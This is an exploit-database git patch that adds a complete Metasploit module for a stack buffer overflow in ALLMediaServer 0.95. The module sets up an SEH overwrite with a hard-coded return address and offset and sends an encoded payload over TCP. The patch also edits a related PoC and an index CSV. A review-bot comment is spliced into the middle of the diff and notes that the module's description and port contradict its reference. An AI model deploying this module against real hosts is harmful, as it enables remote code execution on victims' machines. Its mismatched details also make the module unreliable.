From be0fb79789acf4c5c3d5282f81544202f5a30323 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 29 Dec 2017 05:02:21 +0000 Subject: [PATCH] DB: 2017-12-29 2 changes to exploits/shellcodes ALLMediaServer 0.95 - Buffer Overflow ALLMediaServer 0.95 - Buffer Overflow (PoC) ALLMediaServer 0.95 - Buffer Overflow (Metasploit) DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit) --- exploits/windows/dos/43406.py | 14 +++--- exploits/windows/remote/43407.rb | 73 ++++++++++++++++++++++++++++++++ files_exploits.csv | 5 ++- 3 files changed, 83 insertions(+), 9 deletions(-) create mode 100755 exploits/windows/remote/43407.rb diff --git a/exploits/windows/dos/43406.py b/exploits/windows/dos/43406.py index ab2eeb68f..3b7649f83 100755 --- a/exploits/windows/dos/43406.py +++ b/exploits/windows/dos/43406.py @@ -11,13 +11,13 @@ -1. Description - -A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string. - - -2. Proof of Concept - +#1. Description +# +#A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string. +# +# +#2. Proof of Concept +# #!/usr/bin/python diff --git a/exploits/windows/remote/43407.rb b/exploits/windows/remote/43407.rb new file mode 100755 index 000000000..4e63c0f92 --- /dev/null +++ b/exploits/windows/remote/43407.rb 
@@ -0,0 +1,73 @@
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ALLMediaServer 0.95 Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in ALLMediaServer 0.95.
+ The vulnerability is caused due to a boundary error within the
+ handling of HTTP request.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Anurag Srivastava', # Remote exploit and Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '43406' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => 'process', #none/process/thread/seh
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "",
+ 'Space' => 660,
+ 'DisableNops' => true
+ },
+
+ 'Targets' =>
+ [
+ [ 'ALLMediaServer 0.95 / Windows XP SP3 - English',
+ {
+ 'Ret' => 0x00408315, # POP # POP # POP # RET
+ 'Offset' => 1072
+ }
+ ],
+ [ 'ALLMediaServer 0.95 / Windows 7 SP1 - English',
+ {
+ 'Ret' => 0x00408315, # POP # POP # POP # RET
+ 'Offset' => 1072
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Dec 28 2017',
+ 'DefaultTarget' => 1))
+
+ register_options([Opt::RPORT(888)], self.class)
+
+ end
+
+ def exploit
+ connect
+ buffer = ""
+ buffer << make_nops(target['Offset'])
+ buffer << generate_seh_record(target.ret)
+ buffer << make_nops(19)
+ buffer << payload.encoded
+ print_status("Sending payload ...")
+ sock.put(buffer)
+ handler
+ disconnect
+ end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 219f5f6fa..34245d6ed 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
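Review bot: `register_options([Opt::RPORT(888)], self.class)` passes the owner class as a second argument, which the framework no longer needs and newer modules omit; `register_options([Opt::RPORT(888)])` is the current form. The class name `Metasploit4` likewise predates the framework's `MetasploitModule` naming convention, and the file ends without a trailing newline (`\ No newline at end of file`). On documentation: the `'Description'` attributes the overflow to "handling of HTTP request", whereas the PoC it references (EDB 43406, the file touched earlier in this commit) describes a long string sent to a TCP port, and the port numbers given in the two files differ (88 there, `RPORT(888)` here); the description should say what the module actually exercises so that the entry and its reference agree.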
@@ -5435,7 +5435,7 @@ id,file,description,date,author,type,platform,port
 43391,exploits/windows/dos/43391.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow",2017-12-26,"Aloyce J. Makalanga",dos,windows,
 43401,exploits/hardware/dos/43401.py,"Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service",2017-12-27,LiquidWorm,dos,hardware,
 43403,exploits/windows/dos/43403.py,"SysGauge Server 3.6.18 - Denial of Service",2017-12-27,"Ahmad Mahfouz",dos,windows,
-43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow",2017-12-27,"Aloyce J. Makalanga",dos,windows,
+43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow (PoC)",2017-12-27,"Aloyce J. Makalanga",dos,windows,
 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@@ -15874,6 +15874,7 @@ id,file,description,date,author,type,platform,port
 43387,exploits/hardware/remote/43387.py,"Netcore / Netis Routers - UDP Backdoor Access",2016-12-15,nixawk,remote,hardware,53413
 43388,exploits/multiple/remote/43388.md,"Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control",2017-12-19,CoreLabs,remote,multiple,
 43389,exploits/hardware/remote/43389.py,"COMTREND ADSL Router CT-5367 - Remote Code Execution",2017-12-26,TnMch,remote,hardware,
+43407,exploits/windows/remote/43407.rb,"ALLMediaServer 0.95 - Buffer Overflow (Metasploit)",2017-12-28,"Anurag Srivastava",remote,windows,
 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@@ -37677,7 +37678,7 @@ id,file,description,date,author,type,platform,port
 43399,exploits/php/webapps/43399.txt,"Easy!Appointments 1.2.1 - Cross-Site Scripting",2017-12-27,LiquidWorm,webapps,php,
 43400,exploits/hardware/webapps/43400.html,"Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery",2017-12-27,LiquidWorm,webapps,hardware,
 43402,exploits/hardware/webapps/43402.txt,"Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure",2017-12-27,LiquidWorm,webapps,hardware,
-43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download",2017-12-27,"Glafkos Charalambous",webapps,aspx,
+43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)",2017-12-27,"Glafkos Charalambous",webapps,aspx,
 41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,